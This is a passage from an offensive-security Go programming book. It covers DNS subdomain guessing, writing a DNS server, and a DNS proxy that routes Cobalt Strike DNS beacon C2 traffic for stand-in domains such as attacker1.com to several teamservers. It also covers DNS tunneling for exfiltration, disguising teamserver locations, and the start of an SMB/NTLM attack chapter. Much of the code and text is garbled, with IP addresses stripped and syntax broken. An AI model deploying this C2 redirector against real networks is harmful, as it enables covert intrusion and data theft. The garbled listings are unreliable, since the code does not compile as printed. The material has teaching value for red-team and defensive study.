m.SetQuestion(dns.Fqdn(fqdn), dns.TypeCNAME) in, err := dns.Exchange(&m, serverAddr) if err != nil { return fqdns, err } if len(in.Answer) < 1 { 前沿信安资讯阵地 公众号:i nf osrc Exploiting DNS 115 return fqdns, errors.New("no answer") } for _, answer := range in.Answer { if c, ok := answer.(*dns.CNAME); ok { fqdns = append(fqdns, c.Target) } } return fqdns, nil } func lookup(fqdn, serverAddr string) []result { var results []result var cfqdn = fqdn // Don't modify the original. For { cnames, err := lookupCNAME(cfqdn, serverAddr) if err == nil && len(cnames) > 0 { cfqdn = cnames[0] continue // We have to process the next CNAME. } ips, err := lookupA(cfqdn, serverAddr) if err != nil { break // There are no A records for this hostname. } for _, ip := range ips { results = append(results, result{IPAddress: ip, Hostname: fqdn}) } break // We have processed all the results. } return results } func worker(tracker chan empty, fqdns chan string, gather chan []result, serverAddr string) { for fqdn := range fqdns { results := lookup(fqdn, serverAddr) if len(results) > 0 { gather <- results } } var e empty tracker <- e } type empty struct{} type result struct { IPAddress string Hostname string } func main() { var ( flDomain = flag.String("domain", "", "The domain to perform guessing against.") flWordlist = flag.String("wordlist", "", "The wordlist to use for guessing.") flWorkerCount = flag.Int("c", 100, "The amount of workers to use.") flServerAddr = flag.String("server", "", "The DNS server to use.") 前沿信安资讯阵地 公众号:i nf osrc 116 Chapter 5 ) flag.Parse() if *flDomain == "" || *flWordlist == "" { fmt.Println("-domain and -wordlist are required") os.Exit(1) } var results []result fqdns := make(chan string, *flWorkerCount) gather := make(chan []result) tracker := make(chan empty) fh, err := os.Open(*flWordlist) if err != nil { panic(err) } defer fh.Close() scanner := bufio.NewScanner(fh) for I := 0; i < *flWorkerCount; i++ { go worker(tracker, fqdns, gather, *flServerAddr) } for scanner.Scan() { fqdns <- fmt.Sprintf"%s.%", scanner.Text(), *flDomain) } // Note: We could check scanner.Err() here. go func() { for r := range gather { results = append(results, I.) } var e empty tracker <- e }() close(fqdns) for i := 0; i < *flWorkerCount; i++ { <-tracker } close(gather) <-tracker w := tabwriter.NewWriter(os.Stdout, 0, 8' ', ' ', 0) for _, r := range results { fmt.Fprint"(w, "%s\"%s\n", r.Hostname, r.IPAddress) } w.Flush() } Listing 5-4: The complete subdomain-guessing program (/ch-5/subdomain_guesser/main.go) 前沿信安资讯阵地 公众号:i nf osrc Exploiting DNS 117 Your subdomain-guessing program is complete! You should now be able to build and execute your shiny new subdomain-guessing tool. Try it with word lists or dictionary files in open source repositories (you can find plenty with a Google search). Play around with the number of workers; you may find that if you go too fast, you’ll get varying results. Here’s a run from the authors’ system using 100 workers: $ wc -l namelist.txt 1909 namelist.txt $ time ./subdomain_guesser -domain microsoft.com -wordlist namelist.txt -c 1000 ajax.microsoft.com buy.microsoft.com news.microsoft.com applications.microsoft.com sc.microsoft.com open.microsoft.com ra.microsoft.com ris.microsoft.com smtp.microsoft.com wallet.microsoft.com jp.microsoft.com ftp.microsoft.com develop.microsoft.com ./subdomain_guesser -domain microsoft.com -wordlist namelist.txt -c 1000 0.23s user 0.67s system 22% cpu 4.040 total You’ll see that the output shows several FQDNs and their IP addresses. We were able to guess the subdomain values for each result based off the word list provided as an input file. Now that you’ve built your own subdomain-guessing tool and learned how to resolve hostnames and IP addresses to enumerate different DNS records, you’re ready to write your own DNS server and proxy. Writing DNS Servers As Yoda said, “Always two there are, no more, no less.” Of course, he was talking about the client-server relationship, and since you’re a master of clients, now is the time to become a master of servers. In this section, you’ll use the Go DNS package to write a basic server and a proxy. You can use DNS servers for several nefarious activities, including but not limited to tunneling out of restrictive networks and conducting spoofing attacks by using fake wireless access points. Before you begin, you’ll need to set up a lab environment. This lab environment will allow you to simulate realistic scenarios without having to own legitimate domains and use costly infrastructure, but if you’d like to register domains and use a real server, please feel free to do so. 前沿信安资讯阵地 公众号:i nf osrc 118 Chapter 5 Lab Setup and Server Introduction Your lab consists of two virtual machines (VMs): a Microsoft Windows VM to act as client and an Ubuntu VM to act as server. This example uses VMWare Workstation along with Bridged network mode for each machine; you can use a private virtual network, but make sure that both machines are on the same network. Your server will run two Cobalt Strike Docker instances built from the official Java Docker image (Java is a prerequisite for Cobalt Strike). Figure 5-1 shows what your lab will look like. Client Server Microsoft Windows Ubuntu Linux DNS Docker Java Cobalt strike 1 Java Cobalt strike 2 Figure 5-1: The lab setup for creating your DNS server First, create the Ubuntu VM. To do this, we’ll use version 16.04.1 LTS. No special considerations need to be made, but you should configure the VM with at least 4 gigabytes of memory and two CPUs. You can use an existing VM or host if you have one. After the operating system has been installed, you’ll want to install a Go development environment (see Chapter 1). Once you’ve created the Ubuntu VM, install a virtualization container utility called Docker. In the proxy section of this chapter, you’ll use Docker to run multiple instances of Cobalt Strike. To install Docker, run the follow- ing in your terminal window: $ sudo apt-get install apt-transport-https ca-certificates sudo apt-key adv \ --keyserver hkp://ha.pool.sks-keyservers.net:80 \ --recv-keys 58118E89F3A912897C070ADBF76221572C52609D $ echo "deb https://apt.dockerproject.org/repo ubuntu-xenial main" | sudo tee /etc/apt/sources.list.d/docker.list $ sudo apt-get update $ sudo apt-get install linux-image-extra-$(uname -r) linux-image-extra-virtual $ sudo apt-get install docker-engine $ sudo service docker start $ sudo usermod -aG docker USERNAME After installing, log out and log back into your system. Next, verify that Docker has been installed by running the following command: $ docker version Client: Version: 1.13.1 API version: 1.26 前沿信安资讯阵地 公众号:i nf osrc Exploiting DNS 119 Go version: go1.7.5 Git commit: 092cba3 Built: Wed Feb 5 06:50:14 2020 OS/Arch: linux/amd64 With Docker installed, use the following command to download a Java image. This command pulls down the base Docker Java image but doesn’t create any containers. You’re doing this to prepare for your Cobalt Strike builds shortly. $ docker pull java Finally, you need to ensure that dnsmasq isn’t running, because it listens on port 53. Otherwise, your own DNS servers won’t be able to operate, since they’re expected to use the same port. Kill the process by ID if it’s running: $ ps -ef | grep dnsmasq nobody 3386 2020 0 12:08 $ sudo kill 3386 Now create a Windows VM. Again, you can use an existing machine if available. You don’t need any special settings; minimal settings will do. Once the system is functional, set the DNS server to the IP address of the Ubuntu system. To test your lab setup and to introduce you to writing DNS servers, start by writing a basic server that returns only A records. In your GOPATH on the Ubuntu system, create a new directory called github.com/blackhat-go/bhg/ch-5 /a_server and a file to hold your main.go code. Listing 5-5 shows the entire code for creating a simple DNS server. package main import ( "log" "net" "github.com/miekg/dns" ) func main() { u dns.HandleFunc(".", func(w dns.ResponseWriter, req *dns.Msg) { v var resp dns.Msg resp.SetReply(req) for _, q := range req.Question { w a := dns.A{ Hdr: dns.RR_Header{ Name: q.Name, Rrtype: dns.TypeA, Class: dns.ClassINET, Ttl: 0, }, A: net.ParseIP("").To4(), 前沿信安资讯阵地 公众号:i nf osrc 120 Chapter 5 } x resp.Answer = append(resp.Answer, &a) } y w.WriteMsg(&resp) }) z log.Fatal(dns.ListenAndServe(":53", "udp", nil)) } Listing 5-5: Writing a DNS server (/ch-5/a_server /main.go) The server code starts with a call to HandleFunc() u; it looks a lot like the net/http package. The function’s first argument is a query pattern to match. You’ll use this pattern to indicate to the DNS servers which requests will be handled by the supplied function. By using a period, you’re telling the server that the function you supply in the second argument will handle all requests. The next argument passed to HandleFunc() is a function containing the logic for the handler. This function receives two arguments: a ResponseWriter and the request itself. Inside the handler, you start by creating a new mes- sage and setting the reply v. Next, you create an answer for each question, using an A record, which implements the RR interface. This portion will vary depending on the type of answer you’re looking for w. The pointer to the A record is appended to the response’s Answer field by using append() x. With the response complete, you can write this message to the calling client by using w.WriteMsg() y. Finally, to start the server, ListenAndServe() is called z. This code resolves all requests to an IP address of Once the server is compiled and started, you can test it by using dig. Confirm that the hostname for which you’re querying resolves to That indicates it’s working as designed. $ dig @localhost facebook.com ; <<>> DiG 9.10.3-P4-Ubuntu <<>> @localhost facebook.com ; (1 server found) ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 33594 ;; flags: qr rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0 ;; WARNING: recursion requested but not available ;; QUESTION SECTION: ;facebook.com. IN A ;; ANSWER SECTION: facebook.com. 0 IN A ;; Query time: 0 msec ;; SERVER: ;; WHEN: Sat Dec 19 13:13:45 MST 2020 ;; MSG SIZE rcvd: 58 前沿信安资讯阵地 公众号:i nf osrc Exploiting DNS 121 Note that the server will need to be started with sudo or a root account, because it listens on a privileged port—port 53. If the server doesn’t start, you may need to kill dnsmasq. Creating DNS Server and Proxy DNS tunneling, a data exfiltration technique, can be a great way to establish a C2 channel out of networks with restrictive egress controls. If using an authoritative DNS server, an attacker can route through an organization’s own DNS servers and out through the internet without having to make a direct connection to their own infrastructure. Although slow, it’s difficult to defend against. Several open source and proprietary payloads perform DNS tunneling, one of which is Cobalt Strike’s Beacon. In this section, you’ll write your own DNS server and proxy and learn how to multiplex DNS tunneling C2 payloads by using Cobalt Strike. Configuring Cobalt Strike If you’ve ever used Cobalt Strike, you may have noticed that, by default, the teamserver listens on port 53. Because of this, and by the recommendation of the documentation, only a single server should ever be run on a system, maintaining a one-to-one ratio. This can become problematic for medium- to-large teams. For example, if you have 20 teams conducting offensive engagements against 20 separate organizations, standing up 20 systems capable of running the teamserver could be difficult. This problem isn’t unique to Cobalt Strike and DNS; it’s applicable to other protocols, includ- ing HTTP payloads, such as Metasploit Meterpreter and Empire. Although you could establish listeners on a variety of completely unique ports, there’s a greater probability of egressing traffic over common ports such as TCP 80 and 443. So the question becomes, how can you and other teams share a single port and route to multiple listeners? The answer is with a proxy, of course. Back to the lab. N O T E In real engagements, you’d want to have multiple levels of subterfuge, abstraction, and forwarding to disguise the location of your teamserver. This can be done using UDP and TCP forwarding through small utility servers using various hosting pro- viders. The primary teamserver and proxy can also run on separate systems, having the teamserver cluster on a large system with plenty of RAM and CPU power. Let’s run two instances of Cobalt Strike’s teamserver in two Docker con- tainers. This allows the server to listen on port 53 and lets each teamserver have what will effectively be their own system and, consequently, their own IP stack. You’ll use Docker’s built-in networking mechanism to map UDP ports to the host from the container. Before you begin, download a trial ver- sion of Cobalt Strike at https://trial.cobaltstrike.com/. After following the trial sign-up instructions, you should have a fresh tarball in your download direc- tory. You’re now ready to start the teamservers. 前沿信安资讯阵地 公众号:i nf osrc 122 Chapter 5 Execute the following in a terminal window to start the first container: $ docker run --rmu -itv -p 2020:53w -p 50051:50050x -vy full path to cobalt strike download:/dataz java{ /bin/bash| This command does several things. First, you tell Docker to remove the container after it exits u, and that you’d like to interact with it after starting v. Next, you map port 2020 on your host system to port 53 in the container w, and port 50051 to port 50050 x. Next, you map the directory containing the Cobalt Strike tarball y to the data directory on the con- tainer z. You can specify any directory you want and Docker will happily create it for you. Finally, provide the image you want to use (in this case, Java) { and the command | you’d like to execute on startup. This should leave you with a bash shell in the running Docker container. Once inside the Docker container, start the teamserver by executing the following commands: $ cd /root $ tar -zxvf /data/cobaltstrike-trial.tgz $ cd cobaltstrike $ ./teamserver <IP address of host> <some password> The IP address provided should be that of your actual VM, not the IP address of the container. Next, open a new terminal window on the Ubuntu host and change into the directory containing the Cobalt Strike tarball. Execute the follow- ing commands to install Java and start the Cobalt Strike client: $ sudo add-apt-repository ppa:webupd8team/java $ sudo apt update $ sudo apt install oracle-java8-installer $ tar -zxvf cobaltstrike-trial.tgz $ cd cobaltstrike $ ./cobaltstrike The GUI for Cobalt Strike should start up. After clearing the trial mes- sage, change the teamserver port to 50051 and set your username and pass- word accordingly. You’ve successfully started and connected to a server running completely in Docker! Now, let’s start a second server by repeating the same process. Follow the previous steps to start a new teamserver. This time, you’ll map different ports. Incrementing the ports by one should do the trick and is logical. In a new terminal window, execute the following command to start a new container and listen on ports 2021 and 50052: $ docker run --rm -it -p 2021:53 -p 50052:50050-v full path to cobalt strike download:/data java /bin/bash 前沿信安资讯阵地 公众号:i nf osrc Exploiting DNS 123 From the Cobalt Strike client, create a new connection by selecting Cobalt StrikeNew Connection, modifying the port to 50052, and select- ing Connect. Once connected, you should see two tabs at the bottom of the console, which you can use to switch between servers. Now that you’ve successfully connected to the two teamservers, you should start two DNS listeners. To create a listener, select Configure Listeners from the menu; its icon looks like a pair of headphones. Once there, select Add from the bottom menu to bring up the New Listener window. Enter the following information: • Name: DNS 1 • Payload: windows/beacon_dns/reverse_dns_txt • Host: <IP address of host> • Port: 0 In this example, the port is set to 80, but your DNS payload still uses port 53, so don’t worry. Port 80 is specifically used for hybrid payloads. Figure 5-2 shows the New Listener window and the information you should be entering. Figure 5-2: Adding a new listener Next, you’ll be prompted to enter the domains to use for beaconing, as shown in Figure 5-3. Enter the domain attacker1.com as the DNS beacon, which should be the domain name to which your payload beacons. You should see a message indi- cating that a new listener has started. Repeat the process within the other teamserver, using DNS 2 and attacker2.com. Before you start using these two listeners, you’ll need to write an intermediary server that inspects the DNS messages and routes them appropriately. This, essentially, is your proxy. 前沿信安资讯阵地 公众号:i nf osrc 124 Chapter 5 Figure 5-3: Adding the DNS beacon’s domain Creating a DNS Proxy The DNS package you’ve been using throughout this chapter makes writing an intermediary function easy, and you’ve already used some of these func- tions in previous sections. Your proxy needs to be able to do the following: • Create a handler function to ingest an incoming query • Inspect the question in the query and extract the domain name • Identify the upstream DNS server correlating to the domain name • Exchange the question with the upstream DNS server and write the response to the client Your handler function could be written to handle attacker1.com and attacker2.com as static values, but that’s not maintainable. Instead, you should look up records from a resource external to the program, such as a database or a configuration file. The following code does this by using the format of domain,server, which lists the incoming domain and upstream server separated by a comma. To start your program, create a function that parses a file containing records in this format. The code in Listing 5-6 should be written into a new file called main.go. package main import ( "bufio" "fmt" "os" "strings" ) 前沿信安资讯阵地 公众号:i nf osrc Exploiting DNS 125 u func parse(filename string) (map[string]stringv, error) { records := make(map[string]string) fh, err := os.Open(filename) if err != nil { return records, err } defer fh.Close() scanner := bufio.NewScanner(fh) for scanner.Scan() { line := scanner.Text() parts := strings.SplitN(line, ",", 2) if len(parts) < 2 { return records, fmt.Errorf("%s is not a valid line", line) } records[parts[0]] = parts[1] } return records, scanner.Err() } func main() { records, err := parse("proxy.config") if err != nil { panic(err) } fmt.Printf("%+v\n", records) } Listing 5-6: Writing a DNS proxy (/ch-5/dns_proxy /main.go) With this code, you first define a function u that parses a file containing the configuration information and returns a map[string]string v. You’ll use that map to look up the incoming domain and retrieve the upstream server. Enter the first command in the following code into your terminal win- dow, which will write the string after echo into a file called proxy.config. Next, you should compile and execute dns_proxy.go. $ echo 'attacker1.com,\nattacker2.com,' > proxy.config $ go build $ ./dns_proxy map[attacker1.com: attacker2.com:] What are you looking at here? The output is the mapping between teamserver domain names and the port on which the Cobalt Strike DNS server is listening. Recall that you mapped ports 2020 and 2021 to port 53 on your two separate Docker containers. This is a quick and dirty way for you to create basic configuration for your tool so you don’t have to store it in a database or other persistent storage mechanism. With a map of records defined, you can now write the handler func- tion. Let’s refine your code, adding the following to your main() function. It should follow the parsing of your config file. 前沿信安资讯阵地 公众号:i nf osrc 126 Chapter 5 u dns.HandleFunc(".",func(w dns.ResponseWriter, req *dns.Msg)v { w if len(req.Question) < 1 { dns.HandleFailed(w, req) return } x name := req.Question[0].Name parts := strings.Split(name, ".") if len(parts) > 1 { y name = strings.Join(parts[len(parts)-2:], ".") } z match, ok:= records[name] if !ok { dns.HandleFailed(w, req) return } { resp, err := dns.Exchange(req, match) if err != nil { dns.HandleFailed(w, req) return } | if err := w.WriteMsg(resp); err != nil { dns.HandleFailed(w, req) return } }) } log.Fatal(dns.ListenAndServe(":53", "udp", nil)) To begin, call HandleFunc() with a period to handle all incoming requests u, and define an anonymous function v, which is a function that you don’t intend to reuse (it has no name). This is good design when you have no intention to reuse a block of code. If you intend to reuse it, you should declare and call it as a named function. Next, inspect the incoming questions slice to ensure that at least one question is provided w, and if not, call HandleFailed() and return to exit the function early. This is a pattern used throughout the handler. If at least a single question does exist, you can safely pull the requested name from the first question x. Splitting the name by a period is necessary to extract the domain name. Splitting the name should never result in a value less than 1, but you should check it to be safe. You can grab the tail of the slice—the elements at the end of the slice—by using the slice operator on the slice y. Now, you need to retrieve the upstream server from the records map. Retrieving a value from a map z can return one or two variables. If the key (in our case, a domain name) is present on the map, it will return the corresponding value. If the domain isn’t present, it will return an empty string. You could check if the returned value is an empty string, but that would be inefficient when you start working with types that are more com- plex. Instead, assign two variables: the first is the value for the key, and the second is a Boolean that returns true if the key is found. After ensuring a match, you can exchange the request with the upstream server {. You’re simply making sure that the domain name for which you’ve received the 前沿信安资讯阵地 公众号:i nf osrc Exploiting DNS 127 request is configured in your persistent storage. Next, write the response from the upstream server to the client |. With the handler function defined, you can start the server }. Finally, you can now build and start the proxy. With the proxy running, you can test it by using the two Cobalt Strike listeners. To do this, first create two stageless executables. From Cobalt Strike’s top menu, click the icon that looks like a gear, and then change the output to Windows Exe. Repeat this process from each teamserver. Copy each of these executables to your Windows VM and execute them. The DNS server of your Windows VM should be the IP address of your Linux host. Otherwise, the test won’t work. It may take a moment or two, but eventually you should see a new beacon on each teamserver. Mission accomplished! Finishing Touches This is great, but when you have to change the IP address of your teamserver or redirector, or if you have to add a record, you’ll have to restart the server as well. Your beacons would likely survive such an action, but why take the risk when there’s a much better option? You can use process signals to tell your running program that it needs to reload the configuration file. This is a trick that I first learned from Matt Holt, who implemented it in the great Caddy Server. Listing 5-7 shows the program in its entirety, complete with process signaling logic: package main import ( "bufio" "fmt" "log" "os" "os/signal" "strings" "sync" "syscall" "github.com/miekg/dns" ) func parse(filename string) (map[string]string, error) { records := make(map[string]string) fh, err := os.Open(filename) if err != nil { return records, err } defer fh.Close() scanner := bufio.NewScanner(fh) for scanner.Scan() { line := scanner.Text() parts := strings.SplitN(line, ",", 2) 前沿信安资讯阵地 公众号:i nf osrc 128 Chapter 5 if len(parts) < 2 { return records, fmt.Errorf("%s is not a valid line", line) } records[parts[0]] = parts[1] } log.Println("records set to:") for k, v := range records { fmt.Printf("%s -> %s\n", k, v) } return records, scanner.Err() } func main() { u var recordLock sync.RWMutex records, err := parse("proxy.config") if err != nil { panic(err) } dns.HandleFunc(".", func(w dns.ResponseWriter, req *dns.Msg) { if len(req.Question) == 0 { dns.HandleFailed(w, req) return } fqdn := req.Question[0].Name parts := strings.Split(fqdn, ".") if len(parts) >= 2 { fqdn = strings.Join(parts[len(parts)-2:], ".") } v recordLock.RLock() match := records[fqdn] w recordLock.RUnlock() if match == "" { dns.HandleFailed(w, req) return } resp, err := dns.Exchange(req, match) if err != nil { dns.HandleFailed(w, req) return } if err := w.WriteMsg(resp); err != nil { dns.HandleFailed(w, req) return } }) x go func() { y sigs := make(chan os.Signal, 1) z signal.Notify(sigs, syscall.SIGUSR1) for sig := range sigs { { switch sig { 前沿信安资讯阵地 公众号:i nf osrc Exploiting DNS 129 case syscall.SIGUSR1: log.Println("SIGUSR1: reloading records") | recordLock.Lock() parse("proxy.config") } recordLock.Unlock() } } }() log.Fatal(dns.ListenAndServe(":53", "udp", nil)) } Listing 5-7: Your completed proxy (/ch-5/dns_proxy /main.go) There are a few additions. Since the program is going to be modifying a map that could be in use by concurrent goroutines, you’ll need to use a mutex to control access.1 A mutex prevents concurrent execution of sensitive code blocks, allowing you to lock and unlock access. In this case, you can use RWMutex u, which allows any goroutine to read without locking the others out, but will lock the others out when a write is occurring. Alternatively, implementing goroutines without a mutex on your resource will introduce interleaving, which could result in race conditions or worse. Before accessing the map in your handler, call RLock v to read a value to match; after the read is complete, RUnlock w is called to release the map for the next goroutine. In an anonymous function that’s running within a new goroutine x, you begin the process of listening for a signal. This is done using a channel of type os.Signal y, which is provided in the call to signal.Notify() z along with the literal signal to be consumed by the SIGUSR1 channel, which is a signal set aside for arbitrary purposes. In a loop over the signals, use a switch statement { to identify the type of signal that has been received. You’re configuring only a single signal to be monitored, but in the future you might change this, so this is an appropriate design pattern. Finally, Lock() | is used prior to reloading the running configuration to block any goroutines that may be trying to read from the record map. Use Unlock() } to continue execution. Let’s test this program by starting the proxy and creating a new listener within an existing teamserver. Use the domain attacker3.com. With the proxy running, modify the proxy.config file and add a new line pointing the domain to your listener. You can signal the process to reload its configuration by using kill, but first use ps and grep to identify the process ID. $ ps -ef | grep proxy $ kill -10 PID The proxy should reload. Test it by creating and executing a new stage- less executable. The proxy should now be functional and production ready. 1. Go versions 1.9 and newer contain a concurrent-safe type, sync.Map, that may be used to simplify your code. 前沿信安资讯阵地 公众号:i nf osrc 130 Chapter 5 Summary Although this concludes the chapter, you still have a world of possibilities for your code. For example, Cobalt Strike can operate in a hybrid fashion, using HTTP and DNS for different operations. To do this, you’ll have to modify your proxy to respond with the listener’s IP for A records; you’ll also need to forward additional ports to your containers. In the next chapter, you’ll delve into the convoluted craziness that is SMB and NTLM. Now, go forth and conquer! 前沿信安资讯阵地 公众号:i nf osrc In the previous chapters, you examined various common protocols used for network communication, including raw TCP, HTTP, and DNS. Each of these protocols has interesting use cases for attackers. Although an extensive number of other network protocols exist, we’ll conclude our discussion of network protocols by examining Server Message Block (SMB), a protocol that arguably proves to be the most useful during Windows post-exploitation. SMB is perhaps the most complicated protocol you’ll see in this book. It has a variety of uses, but SMB is commonly used for sharing resources such as files, printers, and serial ports across a network. For the offensive-minded reader, SMB allows interprocess communications between distributed net- work nodes via named pipes. In other words, you can execute arbitrary com- mands on remote hosts. This is essentially how PsExec, a Windows tool that executes remote commands locally, works. 6 IN T E R AC T ING W I T H S M B A N D N T L M 前沿信安资讯阵地 公众号:i nf osrc 132 Chapter 6 SMB has several other interesting use cases, particularly due to the way it handles NT LAN Manager (NTLM) authentication, a challenge-response security protocol used heavily on Windows networks. These uses include remote password guessing, hash-based authentication (or pass-the-hash), SMB relay, and NBNS/LLMNR spoofing. Covering each of these attacks would take an entire book. We’ll begin this chapter with a detailed explanation of how to imple- ment SMB in Go. Next, you’ll leverage the SMB package to perform remote password guessing, use the pass-the-hash technique to successfully authen- ticate yourself by using only a password’s hash, and crack the NTLMv2 hash of a password. The SMB Package At the time of this writing, no official SMB package exists in Go, but we created a package where you can find the book-friendly version at https:// github.com/blackhat-go/bhg/blob/master/ch-6/smb/. Although we won’t show you every detail of this package in this chapter, you’ll still learn the basics of interpreting the SMB specification in order to create the binary com- munications necessary to “speak SMB,” unlike in previous chapters, where you simply reused fully compliant packages. You’ll also learn how to use a technique called reflection to inspect interface data types at runtime and define arbitrary Go structure field tags to marshal and unmarshal com- plicated, arbitrary data, while maintaining scalability for future message structures and data types. While the SMB library we’ve built allows only basic client-side commu- nications, the codebase is fairly extensive. You’ll see relevant examples from the SMB package so that you can fully understand how communications and tasks, such as SMB authentication, work. Understanding SMB SMB is an application-layer protocol, like HTTP, that allows network nodes to communicate with one another. Unlike HTTP 1.1, which communicates using ASCII-readable text, SMB is a binary protocol that uses a combina- tion of fixed- and variable-length, positional, and little-endian fields. SMB has several versions, also known as dialects—that is, versions 2.0, 2.1, 3.0, 3.0.2, and 3.1.1. Each dialect performs better than its predecessors. Because the handling and requirements vary from one dialect to the next, a client and server must agree on which dialect to use ahead of time. They do this during an initial message exchange. Generally, Windows systems support multiple dialects and choose the most current dialect that both the client and server support. Microsoft has provided Table 6-1, which shows which Windows versions select which dia- lect during the negotiation process. (Windows 10 and WS 2016—not shown in the graphic—negotiate SMB version 3.1.1.) 前沿信安资讯阵地 公众号:i nf osrc Interacting with SMB and NTLM 133 Table 6-1: SMB Dialects Negotiated By Windows Versions Operating system Windows 8.1 WS 2012 R2 Windows 8 WS 2012 Windows 7 WS 2008 R2 Windows Vista WS 2008 Previous versions Windows 8.1 WS 2012 R2 SMB 3.02 SMB 3.0 SMB 2.1 SMB 2.0 SMB 1.0 Windows 8 WS 2012 SMB 3.0 SMB 3.0 SMB 2.1 SMB 2.0 SMB 1.0 Windows 7 WS 2008 R2 SMB 2.1 SMB 2.1 SMB 2.1 SMB 2.0 SMB 1.0 Windows Vista WS 2008 SMB 2.0 SMB 2.0 SMB 2.0 SMB 2.0 SMB 1.0 Previous versions SMB 1.0 SMB 1.0 SMB 1.0 SMB 1.0 SMB 1.0 For this chapter, you’ll use the SMB 2.1 dialect, because most modern Windows versions support it. Understanding SMB Security Tokens SMB messages contain security tokens used to authenticate users and machines across a network. Much like the process of selecting the SMB dialect, select- ing the authentication mechanism takes place through a series of Session Setup messages, which allow clients and servers to agree on a mutually sup- ported authentication type. Active Directory domains commonly use NTLM Security Support Provider (NTLMSSP), a binary, positional protocol that uses NTLM password hashes in combination with challenge-response tokens in order to authenticate users across a network. Challenge-response tokens are like the cryptographic answer to a question; only an entity that knows the correct password can answer the question correctly. Although this chapter focuses solely on NTLMSSP, Kerberos is another common authentication mechanism. Separating the authentication mechanism from the SMB specification itself allows SMB to use different authentication methods in different envi- ronments, depending on domain and enterprise security requirements as well as client-server support. However, separating the authentication and the SMB specification makes it more difficult to create an implementation in Go, because the authentication tokens are Abstract Syntax Notation One (ASN.1) encoded. For this chapter, you don’t need to know too much about ASN.1—just know that it’s a binary encoding format that differs from the positional binary encoding you’ll use for general SMB. This mixed encod- ing adds complexity. Understanding NTLMSSP is crucial to creating an SMB implemen- tation that is smart enough to marshal and unmarshal message fields selectively, while accounting for the potential that adjacent fields—within a single message—may be encoded or decoded differently. Go has stan- dard packages that you can use for binary and ASN.1 encoding, but Go’s 前沿信安资讯阵地 公众号:i nf osrc 134 Chapter 6 ASN.1 package wasn’t built for general-purpose use; so you must take into account a few nuances. Setting Up an SMB Session The client and server perform the following process to successfully set up an SMB 2.1 session and choose the NTLMSSP dialect: 1. The client sends a Negotiate Protocol request to the server. The mes- sage includes a list of dialects that the client supports. 2. The server responds with a Negotiate Protocol response message, which indicates the dialect the server selected. Future messages will use that dialect. Included in the response is a list of authentication mechanisms the server supports. 3. The client selects a supported authentication type, such as NTLMSSP, and uses the information to create and send a Session Setup request message to the server. The message contains an encapsulated security structure indicating that it’s an NTLMSSP Negotiate request. 4. The server replies with a Session Setup response message. This message indicates that more processing is required and includes a server chal- lenge token. 5. The client calculates the user’s NTLM hash—which uses the domain, user, and password as inputs—and then uses it in combination with the server challenge, random client challenge, and other data to gen- erate the challenge response. It includes this in a new Session Setup request message that the client sends to the server. Unlike the message sent in step 3, the encapsulated security structure indicates that it’s an NTLMSSP Authenticate request. This way, the server can differentiate between the two Session Setup SMB requests. 6. The server interacts with an authoritative resource, such as a domain controller for authentication using domain credentials, to compare the challenge-response information the client supplied with the value the authoritative resource calculated. If they match, the client is authenti- cated. The server sends a Session Setup response message back to the client, indicating that login was successful. This message contains a unique session identifier that the client can use to track session state. 7. The client sends additional messages to access file shares, named pipes, printers, and so on; each message includes the session identifier as a reference through which the server can validate the authentication status of the client. You might now begin to see how complicated SMB is and understand why there is neither a standard nor a third-party Go package that imple- ments the SMB specification. Rather than take a comprehensive approach and discuss every nuance of the libraries we created, let’s focus on a few of the structures, messages, or unique aspects that can help you imple- ment your own versions of well-defined networking protocols. Instead of 前沿信安资讯阵地 公众号:i nf osrc Interacting with SMB and NTLM 135 extensive code listings, this chapter discusses only the good stuff, sparing you from information overload. You can use the following relevant specifications as a reference, but don’t feel obligated to read each one. A Google search will let you find the latest revisions. MS-SMB2 The SMB2 specification to which we attempted to conform. This is the main specification of concern and encapsulates a Generic Security Service Application Programming Interface (GSS-API) struc- ture for performing authentication. MS-SPNG and RFC 4178 The GSS-API specification within which the MS-NLMP data is encapsulated. The structure is ASN.1 encoded. MS-NLMP The specification used for understanding NTLMSSP authentication token structure and challenge-response format. It includes formulas and specifics for calculating things like the NTLM hash and authentication response token. Unlike the outer GSS-API container, NTLMSSP data isn’t ASN.1 encoded. ASN.1 The specification for encoding data by using ASN.1 format. Before we discuss the interesting snippets of code from the package, you should understand some of the challenges you need to overcome in order to get working SMB communications. Using Mixed Encoding of Struct Fields As we alluded to earlier, the SMB specification requires positional, binary, little-endian, fixed- and variable-length encoding for the majority of the message data. But some fields need to be ASN.1 encoded, which uses explic- itly tagged identifiers for field index, type, and length. In this case, many of the ASN.1 subfields to be encoded are optional and not restricted to a specific position or order within the message field. This may help clarify the challenge. In Listing 6-1, you can see a hypothetical Message struct that presents these challenges. type Foo struct { X int Y []byte } type Message struct { A int // Binary, positional encoding B Foo // ASN.1 encoding as required by spec C bool // Binary, positional encoding } Listing 6-1: A hypothetical example of a struct requiring variable field encodings The crux of the problem here is that you can’t encode all the types inside the Message struct by using the same encoding scheme because B, a Foo type, is expected to be ASN.1 encoded, whereas other fields aren’t. 前沿信安资讯阵地 公众号:i nf osrc 136 Chapter 6 Writing a Custom Marshaling and Unmarshaling Interface Recall from previous chapters that encoding schemes such as JSON or XML recursively encode the struct and all fields by using the same encoding for- mat. It was clean and simple. You don’t have the same luxury here, because Go’s binary package behaves the same way—it encodes all structs and struct fields recursively without a care in the world, but this won’t work for you because the message requires mixed encoding: binary.Write(someWriter, binary.LittleEndian, message) The solution is to create an interface that allows arbitrary types to define custom marshaling and unmarshaling logic (Listing 6-2). u type BinaryMarshallable interface { v MarshalBinary(*Metadata) ([]byte, error) w UnmarshalBinary([]byte, *Metadata) error } Listing 6-2: An interface definition requiring custom marshaling and unmarshaling methods The interface u, BinaryMarshallable, defines two methods that must be implemented: MarshalBinary() v and UnmarshalBinary() w. Don’t worry too much about the Metadata type passed into the functions, as it’s not relevant to understand the main functionality. Wrapping the Interface Any type that implements the BinaryMarshallable interface can control its own encoding. Unfortunately, it’s not as simple as just defining a few func- tions on the Foo data type. After all, Go’s binary.Write() and binary.Read() methods, which you use for encoding and decoding binary data, don’t know anything about your arbitrarily defined interface. You need to create a marshal() and unmarshal() wrapper function, within which you inspect the data to determine whether the type implements the BinaryMarshallable inter- face, as in Listing 6-3. (All the code listings at the root location of / exist under the provided github repo https://github.com/blackhat-go/bhg/.) func marshal(v interface{}, meta *Metadata) ([]byte, error) { --snip-- bm, ok := v.(BinaryMarshallable) u if ok 